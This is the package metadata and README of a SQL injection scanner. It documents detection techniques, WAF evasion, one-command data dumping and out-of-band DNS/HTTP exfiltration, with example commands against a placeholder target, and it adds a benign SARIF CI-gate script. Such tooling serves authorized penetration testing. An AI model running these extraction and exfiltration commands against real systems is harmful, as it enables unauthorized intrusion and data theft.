Metadata-Version: 2.4
Name: sm0g-sql
Version: 0.1.5
Summary: SM0GSQL — Context-aware SQL injection scanner with WAF detection and evasion
Author: SM0G-SEC
License-Expression: AGPL-3.0-or-later
License-File: LICENSE
Keywords: bugbounty,pentest,scanner,security,sql-injection,sqli
Classifier: Development Status :: 4 - Beta
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Requires-Python: >=3.11
Requires-Dist: requests>=2.28.0
Requires-Dist: sm0g-engine>=0.1.5
Requires-Dist: urllib3>=1.26.0
Provides-Extra: dev
Requires-Dist: mypy>=1.0; extra == 'dev'
Requires-Dist: pytest-asyncio>=0.23; extra == 'dev'
Requires-Dist: pytest-mock>=3.0; extra == 'dev'
Requires-Dist: pytest>=8.0; extra == 'dev'
Requires-Dist: requests-mock; extra == 'dev'
Requires-Dist: ruff>=0.4; extra == 'dev'
Requires-Dist: types-requests; extra == 'dev'
Description-Content-Type: text/markdown

# SM0GSQL

> **Context-aware SQL injection scanner** with WAF detection, evasion, and one-command data extraction.

[![PyPI](https://img.shields.io/pypi/v/sm0g-sql.svg)](https://pypi.org/project/sm0g-sql/)
[![Python](https://img.shields.io/pypi/pyversions/sm0g-sql.svg)](https://pypi.org/project/sm0g-sql/)
[![License: AGPL-3.0-or-later](https://img.shields.io/badge/license-AGPL--3.0--or--later-blue.svg)](LICENSE)

```text
+--------------------------------------------------------------+
|                                                              |
|╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╌╮ ╭╌╌╌╌╌╌╌╌╌╌╌╌╮|
|╎   ◎ INFIL   ╎ ╎  ◈ BYPASS   ╎ ╎  ▣ OPERATE  ╎ ╎ ⊟ EXTRACT  ╎|
|╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╌╯ ╰╌╌╌╌╌╌╌╌╌╌╌╌╯|
|                                                              |
+==============================================================+
|   _____ __  __  ___   _____  _____  ____  _                  |
|  / ____|  \/  |/ _ \ / ____|/ ____|/ __ \| |                 |
| | (___ | \  / | | | | |  __| (___ | |  | | |                 |
|  \___ \| |\/| | | | | | |_ |\___ \| |  | | |                 |
|  ____) | |  | | |_| | |__| |____) | |__| | |____             |
| |_____/|_|  |_|\___/ \_____|_____/ \___\_\______|            |
+==============================================================+
```

---

## Highlights

- 🎯 **Six detection techniques** — error-based, boolean-blind, time-blind, UNION, stacked-query, and out-of-band (OOB).
- ⚡ **Async engine** — concurrent probing over httpx; timing-sensitive checks fall back to a sequential stall mode for accurate time-based oracles.
- 🛡️ **WAF fingerprinting + evasion** — detects the wall in front of the app and adapts payloads to get past it.
- 💉 **One-command extraction** — confirm an injection and dump schemas, tables, and rows in the same run with `--exploit`.
- 🗄️ **All major backends** — MySQL/MariaDB, PostgreSQL, MSSQL, Oracle, and SQLite.
- 🕸️ **Surface discovery** — built-in crawler, headless-browser crawl, and OpenAPI spec ingestion.
- 📄 **Reports everywhere** — terminal summary plus HTML, JSON, and SARIF (CI / code-scanning) output.

## Install

```bash
pip install sm0g-sql
```

This pulls the engine dependencies (`sm0g-cli`, `sm0g-core`, `sm0g-payloads`) automatically.

<details>
<summary>From source (development)</summary>

```bash
git clone <repo> && cd SM0GSQL
python -m venv .venv && source .venv/bin/activate
pip install -e ".[dev]"     # editable install + test/lint tooling
pytest -q                   # run the suite
```
</details>

## Quick start

```bash
# scan a single URL
sm0gsql "https://target.tld/item?id=1"

# crawl first, then scan everything found
sm0gsql "https://target.tld/" --crawl

# confirm + extract in one shot (writes HTML/TXT/JSON into a per-target folder)
sm0gsql "https://target.tld/item?id=1" --exploit
```

## Techniques

Pass any combination to `--technique` (default: `EBTUO`):

| Flag | Technique     | Notes                                                 |
|:----:|---------------|-------------------------------------------------------|
| `E`  | Error-based   | Reads DBMS errors reflected in the response.          |
| `B`  | Boolean-blind | Differential true/false response analysis.            |
| `T`  | Time-blind    | Time-delay oracle (uses the sequential stall mode).   |
| `U`  | UNION         | Column-count discovery + UNION data read.             |
| `S`  | Stacked query | Stacked statements where the driver allows them.      |
| `O`  | Out-of-band   | DNS/HTTP exfil via the bundled collector (see below). |

```bash
sm0gsql "https://target.tld/item?id=1" --technique BTU --risk 2 --level 2
```

## Usage

```text
sm0gsql <url> [options]
```

| Option | Description | Default |
|--------|-------------|:-------:|
| `--technique EBTUSO` | Techniques to run (see table above) | `EBTUO` |
| `--risk 1-3` | Payload aggressiveness | `1` |
| `--level 1-3` | Injection-point depth | `1` |
| `--dbms NAME` | Backend hint: `mysql`, `postgres`, `mssql`, `oracle`, `sqlite` | `auto` |
| `--crawl` | Crawl the site before scanning | off |
| `--crawl-depth N` | Crawler depth | `3` |
| `--browser-crawl` | Use a headless browser to crawl | off |
| `--openapi PATH/URL` | Seed surfaces from an OpenAPI spec | — |
| `--exploit` | Extract data after a confirmed finding | off |
| `--dump TABLE` / `--dump-all` | Dump a table / all tables | — |
| `--dump-rows N` | Max rows per table (`0` = default cap) | `0` |
| `--oob DOMAIN` | OOB callback domain | — |
| `--oob-poll URL` | Endpoint returning observed callbacks | — |
| `--login-url / --login-user / --login-pass` | Authenticate before scanning | — |
| `-H "Name: Value"` | Add a header (repeatable) | — |
| `--cookies "k=v; ..."` | Cookie string | — |
| `--proxy URL` | Route traffic through an HTTP proxy | — |
| `--evasion MODE` | WAF-evasion transform(s) | — |
| `--random-agent` | Rotate the User-Agent | off |
| `--threads N` | Concurrency | `5` |
| `--timeout N` / `--delay S` | Request timeout / per-request delay | `15` / `0` |
| `--time-threshold N` | Time-based oracle threshold (s) | `4` |
| `--verify-ssl` | Verify TLS certificates | off |
| `-d, --data BODY` | POST body | — |
| `--output-json / --output-sarif / --report-html PATH` | Write reports | — |
| `-v, --verbose` | Verbose output | off |

## Out-of-band extraction

OOB techniques exfiltrate data through DNS/HTTP callbacks. A minimal collector ships
with the package as the `sm0gsql-oob` command — run it on a host the target can reach:

```bash
sudo sm0gsql-oob          # DNS on udp/53, poll endpoint on http://0.0.0.0:8000/poll
```

Then point the target's resolver at that box and run the scan:

```bash
sm0gsql "https://target.tld/item?id=1" \
  --technique O --oob exfil.your-domain.tld \
  --oob-poll http://your-collector:8000/poll
```

> Binding `udp/53` requires root / `CAP_NET_BIND_SERVICE`.

## Output & reports

- **Terminal** — a colored summary of every confirmed finding.
- **`--exploit`** — writes `JSON` + `TXT` + `HTML` into a `./<target-host>/` folder.
- **`--report-html` / `--output-json` / `--output-sarif`** — emit individual reports anywhere; SARIF plugs straight into CI / code-scanning.
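
As an added example (not part of the sm0g-sql project), here is a small CI gate that consumes a SARIF 2.1.0 report such as the one `--output-sarif` writes and decides whether the pipeline should fail. The embedded report and its rule ids are constructed placeholders, since the page does not document the scanner's own rule ids.

```python
"""CI gate over a SARIF 2.1.0 report (added example, not project code)."""
import json

# Constructed sample report: one error-level and one note-level result.
# Rule ids and messages are placeholders, not SM0GSQL's real identifiers.
SAMPLE_SARIF = json.dumps({
    "version": "2.1.0",
    "runs": [{
        "tool": {"driver": {"name": "SM0GSQL"}},
        "results": [
            {"ruleId": "EXAMPLE-SQLI-ERROR", "level": "error",
             "message": {"text": "Error-based SQL injection (constructed)"},
             "locations": [{"physicalLocation": {"artifactLocation":
                            {"uri": "https://target.tld/item?id=1"}}}]},
            {"ruleId": "EXAMPLE-INFO", "level": "note",
             "message": {"text": "Informational finding (constructed)"}},
        ],
    }],
})

# SARIF result levels in increasing severity order.
SEVERITY_RANK = {"none": 0, "note": 1, "warning": 2, "error": 3}


def summarize(sarif_text):
    """Return (counts_by_level, [(level, ruleId, uri), ...]) for all results."""
    doc = json.loads(sarif_text)
    counts, findings = {}, []
    for run in doc.get("runs", []):
        for result in run.get("results", []):
            # The SARIF spec defaults a missing "level" to "warning".
            level = result.get("level", "warning")
            counts[level] = counts.get(level, 0) + 1
            uri = None
            for loc in result.get("locations", []):
                uri = (loc.get("physicalLocation", {})
                          .get("artifactLocation", {}).get("uri"))
            findings.append((level, result.get("ruleId", "?"), uri))
    return counts, findings


def should_fail(sarif_text, threshold="warning"):
    """True when any result is at or above the threshold level."""
    counts, _ = summarize(sarif_text)
    return any(SEVERITY_RANK.get(lvl, 2) >= SEVERITY_RANK[threshold]
               for lvl in counts)


if __name__ == "__main__":
    counts, findings = summarize(SAMPLE_SARIF)
    for level, rule, uri in findings:
        print(f"{level:8} {rule:22} {uri}")
    raise SystemExit(1 if should_fail(SAMPLE_SARIF) else 0)
```

Run it after the scan step and let its exit status gate the job; pass `threshold="error"` to ignore warning-level findings.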

## Authorization & legal

SM0GSQL is for **authorized security testing only** — penetration tests, bug-bounty
programs within scope, CTFs, and your own lab/staging systems. Running it against
systems you do not own or have **explicit written permission** to test is illegal in
most jurisdictions. You are solely responsible for how you use this tool.

## License

[AGPL-3.0-or-later](LICENSE) — Copyright (c) 2026 SM0G-SEC by roc1t1z3not.
